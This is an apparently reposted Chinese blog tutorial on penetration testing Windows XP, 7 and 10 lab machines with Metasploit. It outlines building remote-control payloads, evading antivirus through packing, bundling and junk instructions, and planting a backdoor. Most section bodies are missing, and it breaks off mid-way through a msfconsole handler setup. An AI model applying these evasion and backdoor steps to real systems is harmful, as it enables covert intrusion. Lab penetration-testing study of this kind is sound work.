使用Metasploit对Windows系统渗透测试——加壳免杀花指令

文章目录

  • 前言
  • 一、准备工作
    • 1.生成被控端攻击载荷
    • 2.生成主控端handler
  • 二、获取win xp的shell
  • 三、获取win 7的shell
  • 四、获取win 10的shell
    • 1.免杀+捆绑
    • 2.加壳+压缩
    • 3.花指令
    • 4.运行攻击载荷
    • 5.添加后门
  • 总结

前言

详细介绍了使用metasploit对windows系统进行渗透测试

测试环境 描述 IP地址
主机 kali 2020——msf6 192.168.1.113
靶机1 windows 10 1805 x64 192.168.1.107
靶机2 windows 7 x64 192.168.1.108
靶机3 windows xp sp3 x32 192.168.1.103

一、准备工作

1.生成被控端攻击载荷

二、获取win xp的shell

①把刚才生成的攻击载荷移动到windows xp

三、获取win 7的shell

获取win 7 shell的步骤和win xp大致相同,不同的是,需要给攻击载荷加免杀,防止被杀掉,还可以给文件捆绑上附加软件,模拟正常软件安装流程

四、获取win 10的shell

win10自带的杀毒软件太厉害,所以要对我们生成的攻击载荷,进行加壳免杀花指令,才能绕过杀毒软件的监控,顺利执行

1.免杀+捆绑

3.花指令

4.运行攻击载荷

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload payload/windows/metsvc_bind_tcppayload => windows/metsvc_bind_tcpmsf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年4月19日
下一篇 2021年4月19日

相关推荐